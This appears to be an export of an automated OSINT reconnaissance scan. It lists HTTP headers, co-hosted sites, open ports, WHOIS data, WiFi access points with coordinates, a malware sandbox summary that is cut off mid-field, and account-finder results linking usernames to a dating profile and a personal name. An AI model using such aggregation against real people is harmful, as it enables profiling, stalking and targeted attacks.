| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | FriendFinder-X (Category: dating)
https://www.friendfinder-x.com/profile/Altpapier | Altpapier |
| 2023-05-12 03:23:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.3:8080 | 188.114.96.0/24 |
| 2023-05-12 03:03:20 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-oo2.github.io |
| 2023-05-12 03:03:27 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000panther.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-cache-status: DYNAMIC | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:92:0E:CC) | 41.8781, -87.6298 |
| 2023-05-12 02:45:50 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:54:19 | Web Content | No | Web Spider | 3 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
.promo {
display: none;
/* display: table; */
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 1;
overflow: auto;
color: lightblue;
background-color: rgba(0,0,0,0.4);
animation: promo-appear-animation 0.35s ease-out;
}
.promo-middle {
display: table-cell;
vertical-align: middle;
}
.promo-content {
width: 80vw;
height: 80vh;
max-width: 80vh;
max-height: 80vw;
margin: auto;
padding: 0;
font-size: 2.8vmax;
font-family: Futura, "Trebuchet MS", Arial, sans-serif;
text-align: center;
background-image: url("promo_back.png");
background-position: center;
background-repeat: no-repeat;
background-size: cover;
border-radius: 15px;
box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
}
.promo-header {
height: 10%;
padding: 2px 16px;
}
.promo-close {
width: 10%;
height: 100%;
text-align: left;
float: left;
font-size: 1.3em;
/* transition: 0.2s; */
}
.promo-close:hover {
/* transform: scale(1.25); */
cursor: pointer;
}
.promo-body {
padding: 8px 16px 16px 16px;
margin: auto;
}
.promo-body p {
margin-top: 0;
mix-blend-mode: color-dodge;
}
.link {
width: 100%;
display: inline-block;
}
.link img {
width: 100%;
}
@keyframes promo-appear-animation {
0% {
transform: scale(2.0);
opacity: 0;
}
100% {
transform: scale(1.0);
opacity: 1;
}
}
</style>
<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-105392568-1', 'auto');
ga('send', 'pageview');
</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
</head>
<body>
<canvas></canvas>
<!-- Mother of God, pls forgive me -->
<div class="promo">
<div class="promo-middle">
<div class="promo-content">
<div class="promo-header">
<span class="promo-close">×</span>
</div>
<div class="promo-body">
<p>Try Fluid Simulation app!</p>
<div class="links-container">
<a class="link" id="apple_link" target="_blank">
<img class="link-img" alt="Download on the App Store" src="app_badge.png"/>
</a>
<a class="link" id="google_link" target="_blank">
<img class="link-img" alt="Get it on Google Play" src="gp_badge.png"/>
</a>
</div>
</div>
</div>
</div>
</div>
<script src="./script.js"></script>
</body>
</html> | fluid.battleb0t.xyz |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00steveng.github.io | 185.199.111.153 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c57f0d8baaf3a64-FRA
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 03:02:26 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | www.ayhu.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:0C:05) | 50.8897, 6.0563 |
| 2023-05-12 03:23:02 | Username | No | Account Finder | 8 | 0 | 7 | 0 | None | baptistevauthey | baptiste vauthey |
| 2023-05-12 03:03:24 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 000.ovh | 000.ovh |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | freesound (Category: music)
https://freesound.org/people/login/ | login |
| 2023-05-12 02:53:49 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["A5D4:2C9F:2F6913:34928C:645D0975"], "Etag": ["W/\"64556a8c-239b\""], "Age": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683818869.392299,VS0,VE127"], "Connection": ["keep-alive"], "Via": ["1.1 varnish"], "X_Fastly_Request_Id": ["770beefb8a8eea06db7f3e4b2376459b2d1c2cbe"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-gig2250052-GIG"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8000::153 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.231): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:DB:1C:01) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:54:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': 4, u'submit_name': u'Tibia maps installer.exe', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-122', u'name': u'Calls an API typically used to create a directory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1074/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1074.001', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter %TEMP%\\ (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter C:\\Users (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter %USERPROFILE%\\AppData (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter %LOCALAPPDATA%\\Temp (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryA" with parameter %TEMP%\\nsaFA07.tmp (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter 
%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "CreateDirectoryW" (UID: 00000000-00002964)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-70', u'name': u'Scanning for window names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1010', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1010', u'relevance': 10, u'threat_level': 0, u'type': 6, u'description': u'"Tibiamapsinstaller.exe" searching for class "#32770"\n "Tibiamapsinstaller.exe" searching for class "SysListView32"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"Tibiamapsinstaller.exe" loaded module "ADVAPI32.DLL" at base 74f70000\n "Tibiamapsinstaller.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base 74a10000\n "Tibiamapsinstaller.exe" loaded module "SETUPAPI.DLL" at base 75190000\n "Tibiamapsinstaller.exe" loaded module "RPCRT4.DLL" at base 757a0000\n "Tibiamapsinstaller.exe" loaded module "SECUR32.DLL" at base 744d0000\n "Tibiamapsinstaller.exe" loaded module "SHELL32.DLL" at base 765b0000\n "Tibiamapsinstaller.exe" loaded module "API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL" at base 73b20000\n "Tibiamapsinstaller.exe" loaded module "API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL" at base 75d40000\n "Tibiamapsinstaller.exe" loaded module "WS2_32.DLL" at base 750a0000\n "Tibiamapsinstaller.exe" loaded module "WINHTTP.DLL" at base 733b0000\n 
"Tibiamapsinstaller.exe" loaded module "%WINDIR%\\SYSTEM32\\MSWSOCK.DLL" at base 738e0000\n "Tibiamapsinstaller.exe" loaded module "%WINDIR%\\SYSTEM32\\WSHIP6.DLL" at base 73960000\n "Tibiamapsinstaller.exe" loaded module "IPHLPAPI.DLL" at base 74aa0000\n "Tibiamapsinstaller.exe" loaded module "CRYPT32.DLL" at base 76010000\n "Tibiamapsinstaller.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL" at base 73fe0000\n "Tibiamapsinstaller.exe" loaded module "DNSAPI.DLL" at base 73880000\n "Tibiamapsinstaller.exe" loaded module "DHCPCSVC6.DLL" at base 73400000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-175', u'name': u'Calls an API typically used to load libraries', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter ADVAPI32.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter OLEACCRC.DLL (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter Secur32.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter SHELL32.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter WS2_32.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter winhttp.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter IPHLPAPI.DLL (UID: 
00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter CRYPT32.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter DNSAPI.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter dhcpcsvc.DLL (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter urlmon.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter CRYPTBASE.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter OLEAUT32.dll (UID: 00000000-00002964)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"0e000f00d87a4e73c4ee1800e8b14c73@ADVAPI32.dll"\n "11001200387f4e73c4ee1800e8b14c73@ADVAPI32.dll"\n "11001200a47f4e73c4ee1800e8b14c73@ADVAPI32.dll"\n "12001300b87f4e73c4ee1800e8b14c73@ADVAPI32.dll"\n "12001300e07f4e73c4ee1800e8b14c73@ADVAPI32.dll"\n "1400150094934e73c4ee1800e8b14c73@ADVAPI32.dll"\n "0d000e0000804e73c4ee1800e8b14c73@SHELL32.dll"\n "0d000e0054804e73c4ee1800e8b14c73@SHELL32.dll"\n "0a000b003c1c6574b4f218002aab4b73@ADVAPI32.dll"\n "0d000e002c1c6574b4f218002aab4b73@ADVAPI32.dll"\n "0f0010001c1c6574b4f218002aab4b73@ADVAPI32.dll"\n "150016002c7a4e7344f41800e8b14c73@ADVAPI32.dll"\n 
"0e000f00a47a4e7344f41800e8b14c73@ADVAPI32.dll"\n "0e000f00d87a4e7344f41800e8b14c73@ADVAPI32.dll"\n "11001200387f4e7344f41800e8b14c73@ADVAPI32.dll"\n "11001200a47f4e7344f41800e8b14c73@ADVAPI32.dll"\n "12001300b87f4e7344f41800e8b14c73@ADVAPI32.dll"\n "12001300e07f4e7344f41800e8b14c73@ADVAPI32.dll"\n "1400150094934e7344f41800e8b14c73@ADVAPI32.dll"\n "25002600ac45977654fd8b00da386376@SETUPAPI.dll"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-176', u'name': u'Calls an API typically used to retrieve function address', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter EventWrite (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter EventRegister (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter EventUnregister (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter DrawThemeBackground (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetThemeBackgroundContentRect (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetThemePartSize (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter RegCloseKey (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter RegQueryValueExW (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter OpenThreadToken (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter OpenProcessToken (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter CheckTokenMembership (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" 
called "GetProcAddress" with a parameter GetTokenInformation (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetUserNameExA (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetSidSubAuthorityCount (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetSidSubAuthority (UID: 00000000 | 185.199.109.153 |
| 2023-05-12 02:53:52 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:50c0:8003::153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | zzzzz (Net ID: 00:01:24:F0:3B:50) | 37.7642, -122.3993 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | USR9111 (Net ID: 00:14:C1:3F:EF:1F) | 40.2024, 29.0398 |
| 2023-05-12 02:55:21 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | openssh | 207.154.228.169 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Turkey | Domain Name: ACILACIKVETERINER.COM
Registry Domain ID: 2652209212_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2023-04-01T13:07:55Z
Creation Date: 2021-11-02T23:11:03Z
Registry Expiry Date: 2023-11-02T23:11:03Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: NSC1.KEYUBU.NET
Name Server: NSC2.KEYUBU.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:11:50Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ACILACIKVETERINER.COM
Registry Domain ID : 2652209212_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2023-04-01T12:50:32Z
Creation Date: 2021-11-02T23:11:03Z
Registrar Registration Expiration Date: 2023-11-02T23:11:03Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: Elazig
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=ACILACIKVETERINER.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: NSC1.KEYUBU.NET
Name Server: NSC2.KEYUBU.NET
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:00Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
